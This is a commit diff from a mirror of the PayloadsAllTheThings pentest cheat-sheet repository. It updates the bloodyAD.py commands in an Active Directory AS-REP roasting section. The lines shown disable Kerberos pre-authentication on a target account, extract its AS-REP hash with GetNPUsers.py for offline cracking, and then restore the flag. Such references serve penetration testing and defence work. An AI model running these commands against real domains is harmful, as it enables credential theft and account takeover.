ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-05 11:05:29 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #609 from m3dsec/patch-1

Browse Source 
Update bloodyAD.py when enabling DONT_REQ_PREAUTH for ASREPRoast attack.
This commit is contained in:
Swissky 2023-01-10 11:06:07 +01:00 committed by GitHub
commit b27ba26af9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Methodology and Resources/Active Directory Attack.md
View File

@ -2945,13 +2945,13 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr
* On Linux:
```bash
# Modify the userAccountControl
$ bloodyAD.py --host [DC IP] -d DOMAIN -u AttackerUser -p MyPassword setDontReqPreauthFlag target_user
$ bloodyAD.py --host [DC IP] -d [DOMAIN] -u [AttackerUser] -p [MyPassword] setUserAccountControl [Target_User] 0x400000 True
# Grab the ticket
$ GetNPUsers.py DOMAIN/target_user -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
# Set back the userAccountControl
$ bloodyAD.py --host [DC IP] -d DOMAIN -u AttackerUser -p MyPassword setDontReqPreauthFlag target_user false
$ bloodyAD.py --host [DC IP] -d [DOMAIN] -u [AttackerUser] -p [MyPassword] setUserAccountControl [Target_User] 0x400000 False
```